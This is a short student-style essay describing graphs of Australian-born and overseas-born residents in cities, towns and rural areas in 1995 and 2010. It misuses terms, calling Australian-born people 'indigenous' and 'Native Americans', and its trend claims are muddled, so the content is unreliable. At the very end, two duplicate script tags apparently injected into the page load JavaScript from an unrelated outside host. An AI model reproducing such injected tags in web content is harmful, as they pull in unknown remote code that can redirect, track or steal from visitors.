The percentage of people who were born in Australia and who were born outside Australia living in urban, rural and town between 1995 and 2010.
The two graphs demonstrate the percentage of Australians living in different areas, including cities, towns, and rural areas in 1995 and 2010. The graphs also divide into 2 types of people which are native and foreign born outside of Australia.
Overall, cities had the highest percentage of people, rural areas had the lowest percent. In both 1995 and 2010, the population of cities increased steadily while the percent of people living in rural areas decreased significantly.
The percentage of people residing in cities grew to about 20%, both indigenous people and people born outside Australia. Native Americans tend to live in rural areas and town more than non native. Comparatively, nonnatives have a higher percentage in the cities, nearly 20% higher than native people. The percent of people living in rural areas dropped dramatically after years. It was nearly 20% for people born in Australia and under 10% for non native, it was a huge fall compared to the figure in 1995.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
